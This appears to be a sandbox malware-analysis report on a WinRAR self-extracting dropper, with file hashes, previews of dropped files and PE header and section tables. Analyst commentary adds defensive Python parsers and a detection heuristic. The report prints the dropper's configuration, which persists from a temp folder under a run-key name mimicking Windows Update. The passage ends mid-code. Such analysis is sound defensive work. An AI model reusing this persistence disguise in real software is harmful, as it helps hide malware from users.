                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):596
                                                                                                                                                                          Entropy (8bit):5.5447068455678234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:w9Xf8t2eoxhWf1SOK0IQO/0dWqMpEzaa6mAcxN0:w9Xs2eoGf0jQO9pEzHhAON0
                                                                                                                                                                          MD5:4F1DAD84085CD5BE9D40662DDE2CC6C2
                                                                                                                                                                          SHA1:D0E8632CDBA8D2B0D2B7F35929E1BB9BDDC2D426
                                                                                                                                                                          SHA-256:490E821B0B1933343886DF46521788A015FBA608E67DD325BF5C861D7E21C358
                                                                                                                                                                          SHA-512:48011F6F7A5A451AB342F30A5FD10D64B729868D251E65A249ABC436CE032959CFD05D1FB19B57D8CBD858994DEE9408AB1881D4DDD393B399330587A90DA578
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Uo4E3Z7tyK..ToolbarConstants GuiDateTimePicker..Ov791uT433ag28M22S9zI815SwG688bb25O771N952n6kNm5V62Ko759pr64B0xWs5KM930076921K..ToolbarConstants DateTimeConstants..bi6M2DZf8xQHXx076Z3V6B4381J3293730ZY0aG27P4owJsPbo900c08fTDG9WHUtl840XGCvvCm97p04Qr49O4q19..FontConstants UpDownConstants..M9nwG09g2QJ09oj6uhP2ii81xs4W1443S6b3559wH1r89Y7eP162tUf6sfY3a2034u95P06680g358..ButtonConstants UpDownConstants..P5Q2HZ38196s3mf52k2LCoEnYj7M73P2V4s14n335689yQkA2114i6440TcTsD5MC5vAR64380d10IBrf42i55qJbWFdO56K9SUevxN4008vstI0O8b392fSx72o2c0a200k9WW6611y90EAPX3Xw39L4226b8759..ButtonConstants BorderConstants..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571
                                                                                                                                                                          Entropy (8bit):5.5797013585600395
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:/HC1eTxrZxShOn8V9rfIrWum3deZ+3Sb/GM1BPc:/i1e1rf5n49rQWn3wcQBO
                                                                                                                                                                          MD5:701A40E797BF193BF1B078ACC8B08D8F
                                                                                                                                                                          SHA1:9AAA897C2EB6C09F60887020D6E0E6FB6793D1E7
                                                                                                                                                                          SHA-256:81883C3AF3BC76D202A2E2A499627B13D09CD7E3EBFF443BF854329BCFB9A3A9
                                                                                                                                                                          SHA-512:8E4946C3FC21D77F3BC267287D202804BDD38C501446EA008F65718A3BDBF5FC05AE3443336BF7A7D3CB60EB473B6CFD29F63D8DA1D8C43FBAB9A9B35E5BB136
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:4M4e123y813Q909y5o4L4sQv31qckhv715v3p88N22222pODEo3h69YXF4694361vw092IICqIgJD44aP7z4715o3T350RO84r0jsD664HhTeZ7vA5Z721L582LkS..FileConstants ColorConstants..jSGz6f4AGJ2k6ycRm79zywdOa5b640F01Z7w44xG61e8r11Z75qOyz64305NA9jV974y4222S5V5Q8W111yw0QM..ToolbarConstants ButtonConstants..3T6lSlO1kBqPR640E13B88B72GH9345392uId456352i0o29pVr508..BorderConstants DateTimeConstants..B7w33pKO5lfUU978g73buN8lCv4..DateTimeConstants FontConstants..9059j2hH51CowjY9cKcSn2X0p7335p172t2031wps95E76H7562DT3V52Fdel361931g0G714dwM68VUfw180Zxc9LBM954jhG64..ToolTipConstants TreeViewConstants..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126003968
                                                                                                                                                                          Entropy (8bit):7.032325966137812
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:VuJdrXFG9geFdXFEq2JXYLsAU62B+HkeCKjdTuSuth8gidLIwyYXE24jcg1hSng3:u
                                                                                                                                                                          MD5:3F7DDC4ECBDAF26A3CA18881DBCB0444
                                                                                                                                                                          SHA1:87B7AD58BB268E450C8F6A3DA3A9BBF782F7293A
                                                                                                                                                                          SHA-256:2077070EC9BD352469129F6AA8CAF53BE0E4A9ED642BE8258203B428CE6FEC21
                                                                                                                                                                          SHA-512:A66A60C3034519442DE13C3A4D02F4135D54B1FE971A8B994C5CD525603B5C77B5EBF8276A665FE5B97D157C637587E981556C2C5CFD4504ADE37667059439C7
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:..;....H...,u.L.{2.33..P...+qQFp$.k......,hL...1.%(.o.HH.....m...4K.F...@.%y.b........@j.D./.@'.O.h#.ncK>...g..\......l7...`!....N.....#.c.s..n..@...r).2.......(....4. .l...........0.(....,...>...F....1.Bq..........x.....y.~..9....}/.\....u..go..8.~.j.e.......*pq..:....*z..Q.B.@..6_.. ..........V..}...8h@@.b.c...K.n..}.u.uF.}I.....qH.$:Z1.=........*....{..b`.X.......Y...?dz..3XA4....+...e...G.B_E.].I..?.........5W.|.....J....P1.R.s...!...e..3.F.Z....f.q_.!..y...fw......'.@.'D.K..O.....`.{........{..M....y!...........jE*....p.9......X$.G.'....f.Y....$..V....{N......6.l.$..$.O....r.B..4H!.............*.C..36N........}...X.+.....Z....."..9....y....[9h..sQhA.w..3..z.A,.<....f......y..A....^p..L.c+....?t+....%S=3_g.6.i..{.d8.'2.k*Lq[....^"...O.h.....s/...<.1A;.4.5=hA..........;aa....2.t.c.c.....F.K.c.h.6.8.8.w.H.R.N.y.0.G.8.2.f.a.6.W.l......4.6...U/1R?.b$..n...5@.......8.1.M.4.d.1.B.m.i.C.s.X.6.8.x.6.7.3.5.u.T.8.5.2.1.N.9.t.R.4.9.B.7.1.s.4.c.j.
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):517
                                                                                                                                                                          Entropy (8bit):5.63557700637518
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:cd1SzN8jzwOsy6prpGbfGSEybsw8RedLjPERsASXmv:cizVOMrpGbfGFGeRuEAWv
                                                                                                                                                                          MD5:FF1863DA6E6FD356E9EB8B8A2D2C5B12
                                                                                                                                                                          SHA1:10B8480E705597FB75BCA8C23ED0739B49500A8B
                                                                                                                                                                          SHA-256:6FBA20CB3849CF46B768F3BA627B3673D2C4B3B66AD2E994D245024C4E729366
                                                                                                                                                                          SHA-512:28B019D426893E2ACD7526FCB6B09575A904AA3B06AB4F34588C455D4394DED61905F0A2A01A6FE1DD1053562A3F2C181719310F260A61E62D4E3AAD996C998B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:K75x8q9NtB50320T004H5mm2bfhu8LrSxM96L6680os0Ew1i71K6rTuDjgmq1P9x48KlM5uuq961sAmlDYAK23JQ16Kp3a0KTrw27rM69M91Hg56Lmm0Us7jPNpx0fGOSl72f9r8R90HA10T926R2q8801U..ToolbarConstants ToolTipConstants..7h6dCeH6F9A1518Ule16d2kd0016uXhz8W96ui326688RQ6q5673x91Q8G4I5I8VU4z59cyX5Pj..ButtonConstants ToolTipConstants..i6T20z4ldGcO250jK8z125DexY491zz2Yp6o8DEJKjP0070Gn1Tl89dW8q382s2..GuiDateTimePicker TreeViewConstants..7nKaUWw9I016671K43N5k51V14ZeNSj308671fD8i01P45pv1M83nudu2D6jC43xa283gk00M..GuiDateTimePicker GuiDateTimePicker..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):82
                                                                                                                                                                          Entropy (8bit):4.912387450178842
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YRRvuf0nNp9JlC9hRGdYPZydV/OR/:Av7hoGpdV/OR/
                                                                                                                                                                          MD5:9A92712A859FFE6FF38F1D0D648F0722
                                                                                                                                                                          SHA1:20487A21C16820EDC855294F46E09BCE0A80C8FD
                                                                                                                                                                          SHA-256:91922CDC2C5D62252CA87D21C63430CD15BB0A03246D2514B7C4E87B9CE6F097
                                                                                                                                                                          SHA-512:4B33BA553CAE489AA233DD6CDE044D1443E13C685FBED7402F1FD494CDACC1F522023B0A20F01FF2AFEC16B142BE949C82BCA3195B27AD5A32E740D69D58A160
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=oqck..ExE_c=dmqiuorkt.mp2..
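The 82-byte file above is the SFX loader's settings: a leet-spelled INI whose `..` in the preview are the CR LF terminators, naming a base path (`%temp%`), a sub-directory, a persistence name and the file to execute, which is the same `dmqiuorkt.mp2` that the report shows as the dropping process. The parser below is an added example, not code from the report or from the malware; it reconstructs the file byte for byte from the preview, expands the path the way the loader would on the victim, and derives the host artifacts an analyst would hunt for. The plain names given to the keys (`base_path`, `subdir`, `executable`) and the reading of `Key=` as a Run-key value name are my assumptions; this section shows the file, not the registry write.

```python
import hashlib
import ntpath
import re

# Constructed from the report's preview of the 82-byte settings file dropped
# by dmqiuorkt.mp2; the ".." in the preview are CR LF line terminators.
SETTINGS_BYTES = (
    b"[S3tt!ng]\r\n"
    b"stpths=%temp%\r\n"
    b"Key=WindowsUpdate\r\n"
    b"Dir3ctory=oqck\r\n"
    b"ExE_c=dmqiuorkt.mp2\r\n"
)

# Leet-style key names seen in the file, mapped to plain names. The plain
# names are an interpretation of the file, not a documented loader format.
KEY_ALIASES = {
    "stpths": "base_path",
    "key": "run_key_name",
    "dir3ctory": "subdir",
    "exe_c": "executable",
}


def parse_settings(data: bytes) -> dict:
    """Parse the [S3tt!ng] file into plain key/value pairs."""
    text = data.decode("ascii")
    section = None
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" not in line:
            raise ValueError(f"unparseable line: {line!r}")
        key, value = (part.strip() for part in line.split("=", 1))
        values[KEY_ALIASES.get(key.lower(), key.lower())] = value
    if section is None:
        raise ValueError("no section header")
    values["section"] = section
    return values


# Fixed environment so the expansion is deterministic and offline; on a real
# host you would feed in the victim user's environment instead.
DEMO_ENV = {"temp": r"C:\Users\user\AppData\Local\Temp"}


def expand_windows_vars(value: str, env: dict) -> str:
    """Expand %VAR% references case-insensitively, as the shell would."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), value)


def derive_artifacts(cfg: dict, env: dict = DEMO_ENV) -> dict:
    """Turn the parsed settings into the host artifacts to look for."""
    base = expand_windows_vars(cfg["base_path"], env)
    drop_dir = ntpath.join(base, cfg["subdir"])
    exe_path = ntpath.join(drop_dir, cfg["executable"])
    return {
        "drop_dir": drop_dir,
        "exe_path": exe_path,
        # Assumption: Key= is the value name written under a Run key and the
        # value data is the persisted executable; the file alone does not prove it.
        "run_value_name": cfg["run_key_name"],
        "run_value_data": exe_path,
    }


SUSPICIOUS_PARENTS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\public\\")
LEGIT_LOOKING_NAMES = {"windowsupdate", "windows update", "microsoft", "defender", "onedrive"}


def assess(artifacts: dict) -> list:
    """Flag what an analyst or a detection rule would key on."""
    findings = []
    target = artifacts["run_value_data"].lower()
    if any(parent in target for parent in SUSPICIOUS_PARENTS):
        findings.append("run key points into a user-writable temp/profile folder")
    if artifacts["run_value_name"].lower() in LEGIT_LOOKING_NAMES:
        findings.append("run value name impersonates a Windows component")
    if not artifacts["exe_path"].lower().endswith(".exe"):
        findings.append("persisted payload uses a non-executable extension")
    return findings


def file_hashes(data: bytes) -> dict:
    """Hashes of the reconstructed bytes, to compare with the report's file entry."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


if __name__ == "__main__":
    cfg = parse_settings(SETTINGS_BYTES)
    artifacts = derive_artifacts(cfg)
    for name, value in artifacts.items():
        print(f"{name:16} {value}")
    for finding in assess(artifacts):
        print("!", finding)
    print(file_hashes(SETTINGS_BYTES))
```

The reconstruction is exactly 82 bytes, which is the size the report gives; if it is byte-exact, `file_hashes()` returns the MD5 the report lists for this file, and a mismatch means the preview hid a byte the dots did not show. Three things make this configuration worth a detection rule: the persisted path sits under `%temp%`, the value name mimics Windows Update, and the payload carries a `.mp2` extension while being run as a program.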
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.817350544572259
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:FX6KTgnipP.exe
                                                                                                                                                                          File size:1'330'396 bytes
                                                                                                                                                                          MD5:09ac9eae3546e42f6bbcc605242133d0
                                                                                                                                                                          SHA1:ca07478bd504d2c690948e9c21771ec5ac4de018
                                                                                                                                                                          SHA256:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a
                                                                                                                                                                          SHA512:6a4925672c5002005e590ec4fb731c300db2db750a8933479e709f2ed28fd0100725f92da8b0162b2bd0936a9b2dac5e729674e39b68bb03af11ca2348fb2f76
                                                                                                                                                                          SSDEEP:24576:iN/BUBb+tYjBFHk+/qKEKhkiM70SrdO8jO2MHoXiM0hD6di/Aea:CpUlRhkIJm08OaEIXiM0hDTY
                                                                                                                                                                          TLSH:80551202BBC48473D17215325BB29715197D7D615FA18A8B63E038BEAB319C2D732FA3
                                                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                                                                                                                                                          Icon Hash:3371f1a5e1534a33
                                                                                                                                                                          Entrypoint:0x4265d0
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                          File Version Major:5
                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                          Import Hash:99ee65c2db82c04251a5c24f214c8892
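The header fields above (entry point, its section, link timestamp, subsystem, DLL characteristics, OS version) all come from the COFF and optional headers and are the first thing to re-derive yourself when a report's triage matters. The parser below is an added example, not part of the report and not a tool the report used. It decodes those fields from raw bytes with nothing but `struct`, locates the section that holds the entry point, and adds two checks a triager wants: which of the standard mitigations (ASLR, DEP, CFG) the image opted out of, and whether the link timestamp is zeroed or in the future. Since the sample itself is not on this page, the demo input is a synthetic PE32 header I constructed to carry the values the report lists; its single `.text` section and its sizes are made up, and the linker version, checksum and data directories are placeholders. To run it on a real file, pass `open(path, "rb").read()` to `parse_pe()`.

```python
import struct
from datetime import datetime, timezone

COFF_FMT = "<HHIIIHH"                     # IMAGE_FILE_HEADER (20 bytes)
OPT32_FMT = "<HBBIIIIIIIIIHHHHHHIIIIHH"   # PE32 optional header through DllCharacteristics (72 bytes)
SECTION_FMT = "<8sIIIIIIHHI"              # IMAGE_SECTION_HEADER (40 bytes)

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
                       0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}
EXPECTED_MITIGATIONS = ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF")


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Decode the COFF/optional headers and locate the entry point's section."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, coff_off)
    opt_off = coff_off + struct.calcsize(COFF_FMT)
    opt = struct.unpack_from(OPT32_FMT, data, opt_off)
    if opt[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled here")
    entry_rva, image_base = opt[6], opt[9]
    # The section table follows the optional header; find the section holding the entry RVA.
    entry_section = None
    sect_off = opt_off + opt_size
    for i in range(nsect):
        name, vsize, va, rawsize, *_ = struct.unpack_from(SECTION_FMT, data, sect_off + 40 * i)
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name.rstrip(b"\0").decode("ascii", "replace")
    return {
        "machine": machine,
        "entrypoint": image_base + entry_rva,
        "entry_section": entry_section,   # None: entry point outside every section, itself a red flag
        "time_stamp_raw": stamp,
        "time_stamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "subsystem": SUBSYSTEMS.get(opt[22], f"unknown({opt[22]})"),
        "dll_characteristics": flag_names(opt[23], DLL_CHARACTERISTICS),
        "os_version": f"{opt[12]}.{opt[13]}",
    }


def missing_mitigations(info: dict) -> list:
    """Standard mitigations the image did not opt into."""
    return [m for m in EXPECTED_MITIGATIONS if m not in info["dll_characteristics"]]


def timestamp_verdict(info: dict, reference_epoch: int) -> str:
    """Crude plausibility test: a zero or future link stamp was zeroed or tampered with."""
    ts = info["time_stamp_raw"]
    if ts == 0:
        return "zeroed"
    if ts > reference_epoch:
        return "in the future"
    return "plausible"


def build_demo_pe() -> bytes:
    """Synthetic header carrying the field values the report lists for FX6KTgnipP.exe.
    Constructed for this example: one made-up .text section, no code, no imports."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                       # e_lfanew
    coff = struct.pack(COFF_FMT, 0x14C, 1, 0x6640971F, 0, 0, 0xE0, 0x0102)
    opt = struct.pack(OPT32_FMT, 0x10B, 14, 0,
                      0x40000, 0x20000, 0, 0x265D0, 0x1000, 0x41000, 0x400000, 0x1000, 0x200,
                      5, 1, 5, 1, 5, 1,
                      0, 0x150000, 0x400, 0,
                      2, 0xC140)                                   # GUI; DYNAMIC_BASE|NX|GUARD_CF|TS_AWARE
    opt += bytes(0xE0 - len(opt))                                 # data directories left zeroed
    text = struct.pack(SECTION_FMT, b".text\0\0\0", 0x40000, 0x1000, 0x40000, 0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + opt + text


if __name__ == "__main__":
    info = parse_pe(build_demo_pe())
    for key, value in info.items():
        print(f"{key:20} {value:#x}" if isinstance(value, int) else f"{key:20} {value}")
    print("missing mitigations:", missing_mitigations(info) or "none")
    print("timestamp:", timestamp_verdict(info, 1733000000))      # reference: late Nov 2024
```

Two caveats the output makes concrete. A dropper with every mitigation enabled is not unusual: ASLR, DEP and CFG protect the image's own code, and a loader that injects a payload into another process never relies on that code being exploited. And a plausible link stamp is only weak evidence of build date; it is a 32-bit field the author can set to anything, so treat it as a pivot for clustering related builds rather than as a fact.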
                                                                                                                                                                          Instruction
                                                                                                                                                                          call 00007FD184818B0Bh
                                                                                                                                                                          jmp 00007FD18481848Dh
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push ecx
                                                                                                                                                                          lea ecx, dword ptr [esp+08h]
                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                          and ecx, 0Fh
                                                                                                                                                                          add eax, ecx
                                                                                                                                                                          sbb ecx, ecx
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          jmp 00007FD184817B3Fh
                                                                                                                                                                          push ecx
                                                                                                                                                                          lea ecx, dword ptr [esp+08h]
                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                          and ecx, 07h
                                                                                                                                                                          add eax, ecx
                                                                                                                                                                          sbb ecx, ecx
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          jmp 00007FD184817B29h
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                          call 00007FD18480B069h
                                                                                                                                                                          push 0044634Ch
                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                          push eax
                                                                                                                                                                          call 00007FD184819337h
                                                                                                                                                                          int3
                                                                                                                                                                          jmp 00007FD18481F06Eh
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push 004293C0h
                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                          mov eax, dword ptr [esp+10h]
                                                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                                                          lea ebp, dword ptr [esp+10h]
                                                                                                                                                                          sub esp, eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          mov eax, dword ptr [00449778h]
                                                                                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                                                                          push dword ptr [ebp-08h]
                                                                                                                                                                          mov eax, dword ptr [ebp-04h]
                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                          lea eax, dword ptr [ebp-10h]
                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                          ret
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          pop edi
                                                                                                                                                                          pop edi
                                                                                                                                                                          pop esi
                                                                                                                                                                          pop ebx
                                                                                                                                                                          mov esp, ebp
                                                                                                                                                                          pop ebp
                                                                                                                                                                          push ecx
                                                                                                                                                                          ret
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x17ee4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x2afc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x58000 | 0x17ee4 | 0x18000 | 7a6f4fdc915a9e791c0d436729708e3a | False | 0.7992757161458334 | data | 7.356836112369401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x70000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
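The data-directory and section tables above can be regenerated from the file with a short standard-library parser. The script below is an added example, not Joe Sandbox code: it resolves each directory RVA to the section that maps it (the Is in Section column), computes per-section Shannon entropy (the Entropy column) and returns the overlay, i.e. the bytes past the last section's raw data. Two checks worth running against this report: IMAGE_DIRECTORY_ENTRY_SECURITY is 0x0/0x0, so there is no Authenticode certificate table and the file is unsigned; and the six raw section sizes sum to 0x63000 bytes (405,504) against the 1'330'396-byte file size given in the process list, so well over 900 KB sit in the overlay, which is where a WinRAR SFX stub keeps its archive (the extraction directory RarSFX0 appears in the wscript.exe command line further down). The PE produced by build_test_pe() is constructed for the self-test (three sections and a RAR5-signature tail) and is not the sample; the RAR signature check is an assumption about what this sample's overlay holds, since the report does not dump it.

```python
"""Static PE triage with the standard library: section table, data-directory
placement, per-section entropy and overlay size.  Added example, not Joe
Sandbox code; build_test_pe() constructs a small PE32 for the self-test."""
import struct
from math import log2

# Order of IMAGE_OPTIONAL_HEADER.DataDirectory, named as in the report's table
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
COFF_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER, 20 bytes
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")  # RAR4 / RAR5 signatures

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * log2(c / n) for c in counts if c)

def parse_pe(data: bytes) -> dict:
    """Read the COFF header, the data directories and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
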